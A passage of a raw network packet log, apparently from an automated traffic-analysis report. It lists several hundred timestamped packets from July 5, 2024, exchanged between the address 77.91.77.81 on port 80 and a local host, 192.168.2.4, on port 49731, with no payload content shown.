                                                                Jul 5, 2024 04:23:06.382843018 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.382857084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.382872105 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.382888079 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.382889986 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.382904053 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.382905960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.382925034 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.382947922 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.382956028 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.382968903 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.382982969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.382998943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383009911 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383013964 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383025885 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383029938 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383049011 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383057117 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383089066 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383090019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383105040 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383119106 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383131981 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383136034 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383152008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383167028 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383197069 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383207083 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383223057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383236885 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383249044 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383253098 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383270025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383280993 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383297920 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383305073 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383313894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383332014 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383341074 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383351088 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383358002 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383368969 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383373022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383388042 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383389950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383405924 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383407116 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383431911 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383456945 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383482933 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383497953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383513927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383527994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383532047 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383543015 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383548975 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383558035 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383559942 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383577108 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383578062 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383595943 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383606911 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383622885 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383630037 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383637905 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383652925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383667946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383670092 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383683920 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383691072 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383699894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383707047 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383718014 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383733034 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383755922 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383764029 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383770943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383795023 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383805037 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383809090 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383826017 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383837938 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383838892 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.383865118 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.383888006 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415170908 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415188074 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415203094 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415255070 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415292025 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415313005 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415328026 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415354013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415360928 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415369987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415379047 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415385008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415400028 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415400982 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415416956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415420055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415432930 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415438890 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415446043 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415450096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415463924 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415467024 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415483952 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.415484905 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415503025 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415519953 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.415530920 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446372986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446414948 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446432114 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446453094 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446479082 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446491957 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446506977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446522951 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446537971 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446567059 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446604967 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446619987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446641922 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446649075 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446657896 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446670055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446674109 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446686983 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446701050 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446707010 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446717024 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446726084 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446731091 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446747065 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.446748018 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446755886 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446779013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.446789026 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.471822977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.471838951 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.471860886 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.471905947 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.471940994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.471956015 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.471982002 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.471982002 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.471988916 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472003937 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472012997 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472022057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472035885 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472038031 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472052097 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472053051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472063065 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472069979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472080946 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472093105 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472119093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472134113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472134113 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472148895 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472161055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472166061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472177029 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472182035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472193956 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472208977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472213030 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472229004 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472233057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472244978 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472249031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472265959 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472275019 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472280979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472290993 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472296953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472306013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472313881 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472326040 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472330093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472345114 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472346067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472359896 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472364902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472378969 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472389936 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472392082 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472405910 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472415924 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472429991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472431898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472450018 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472459078 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472465038 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472475052 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472487926 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472497940 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472506046 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472515106 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472529888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472541094 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472547054 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472556114 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472564936 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472570896 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472590923 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472596884 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472609997 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472620010 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472635031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472652912 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472661972 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472693920 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472798109 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472817898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472834110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472851038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472866058 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472884893 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472887039 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472901106 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472915888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472925901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472939968 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.472946882 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472959995 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.472979069 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473017931 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473032951 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473047018 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473061085 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473061085 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473074913 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473078012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473093033 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473094940 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473113060 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473113060 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473130941 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473133087 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473140955 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473148108 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473159075 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473176003 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473186016 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473253965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473269939 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473284006 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473299026 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473308086 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473315954 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473318100 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473332882 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473347902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473355055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473365068 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473377943 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473382950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473406076 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473422050 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473428965 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473438025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473462105 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473464012 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473478079 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473484039 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473495960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473505974 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473512888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473519087 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473530054 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473539114 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473547935 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473557949 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473565102 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473573923 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473579884 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473594904 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473602057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473603010 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473618984 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473623991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473644018 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473659039 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473696947 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473712921 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473726988 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473742962 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473743916 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473759890 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473759890 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473776102 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473778963 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473795891 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473802090 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473805904 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473820925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473823071 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473839998 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.473845959 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473862886 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.473880053 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504714012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504731894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504756927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504771948 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504787922 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504805088 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504806042 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504833937 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504846096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504858017 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504867077 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504892111 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504897118 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504908085 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504910946 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504925013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504934072 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504947901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504951954 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504966974 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.504970074 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504985094 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.504996061 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.505008936 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.505008936 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.505027056 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.505031109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.505044937 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.505073071 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:23:06.536956072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.536984921 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.536999941 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:23:06.537028074 CEST4973180192.168.2.477.91.77.81
